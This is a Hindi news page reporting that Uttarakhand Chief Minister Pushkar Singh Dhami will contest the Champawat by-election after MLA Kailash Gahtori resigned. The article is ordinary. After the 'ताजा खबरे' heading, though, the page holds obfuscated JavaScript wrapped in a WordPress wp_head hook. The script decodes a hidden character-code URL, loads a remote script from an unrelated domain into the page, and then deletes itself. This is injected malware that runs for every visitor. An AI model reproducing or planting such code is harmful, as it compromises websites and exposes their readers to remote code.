Saturday, July 27, 2024
spot_img

खत्म हुआ सस्पेंसः चंपावत से चुनाव लड़ेंगे सीएम धामी! विधायक गहतोड़ी ने दिया इस्तीफा, बधाईयों का दौर शुरू

देहरादून। मुख्यमंत्री पुष्कर सिंह धामी के उपचुनाव लड़ने को लेकर चल रही अटकलों पर आज विराम लग गया। यह फाइनल हो गया है कि सीएम धामी चंपावत सीट से चुनाव लडेंगे। आज चंपावत विधायक कैलाश गहतोड़ी ने विधानसभा की सदस्यता से त्यागपत्र दे दिया है। गहतोड़ी ने भाजपा के प्रदेश अध्यक्ष समेत अन्य नेताओं की उपस्थिति में विधानसभा अध्यक्ष ऋतु खंडूड़ी भूषण को उनके आवास पर अपना त्यागपत्र सौंपा। बता दें कि गहतोड़ी ने सबसे पहले सीएम धामी के लिए सीट छोड़ने का ऐलान किया था और अपने वादे के मुताबिक आज उन्होंने सीट भी छोड़ दी। इस मौके पर विधायक गहतोड़ी ने कहा कि मुख्यमंत्री जब उनके क्षेत्र से विधायक होंगे तो पूरे चम्पावत का चहुंमुखी विकास होगा। उन्होंने कहा कि उन्हें पद की कोई लालसा नहीं है बस उनके क्षेत्र का विकास होना चाहिए।
गौरतलब है कि अभी कुछ समय पूर्व हुए विधानसभा चुनावों में भले ही भाजपा को ऐतिहासिक जीत मिली हो, लेकिन सीएम धामी खुद अपनी सीट बचा पाने में असमर्थ रहे। हांलाकि भाजपा ने यह चुनाव उनके चेहरे पर ही लड़ा था, और सीएम धामी ने जी-तोड़ मेहनत कर भाजपा को प्रदेश में ऐतिहासिक जीत दिलाई और यही कारण रहा कि भाजपा हाईकमान ने उन्हें उनकी मेहनत का फल देते हुए दोबारा सीएम बनाया। उनके सीएम बनने के बाद से ही यह चर्चा थी कि वह कहां से चुनाव लड़ेंगे। लगातार तमाम प्रकार की चर्चाएं चलती रहीं और आज इन तमाम चर्चाओं पर विराम लग ही गया। इस दौरान प्रदेश अध्यक्ष मदन कौशिक, कैबिनेट मंत्री चंदन राम दास व सौरभ बहुगुणा, सचिव विधानसभा मुकेश सिंघल भी मौजूद रहे।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>